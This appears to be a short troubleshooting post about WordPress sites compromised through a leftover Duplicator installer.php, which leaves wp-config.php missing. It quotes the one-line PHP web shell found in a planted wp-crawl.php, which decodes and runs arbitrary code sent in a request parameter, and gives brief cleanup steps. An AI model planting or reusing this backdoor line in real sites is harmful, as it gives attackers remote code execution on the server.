wp-config.php goes missing

There are instances when wordpress installation is attacked exploiting the installer.php of duplicator plugin. WordPress website suddenly displays the installation process due to missing wp-config.php file.

For all infected versions,  a file called wp-crawl.php in the WP-root and in upload folder.

@file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');

All the infected installations have Duplicator installed, and the installer.php file is often very old.

Duplicator doesn’t have to be installed. Previous versions of Duplicator if the installer.php file is left unremoved, and this file could be exploited.

Quick fix /solution is: 

i) remove both wp-crawl.php file 

ii) copy wp-config.php file from other project.

iii) change database name and password in wp-config.php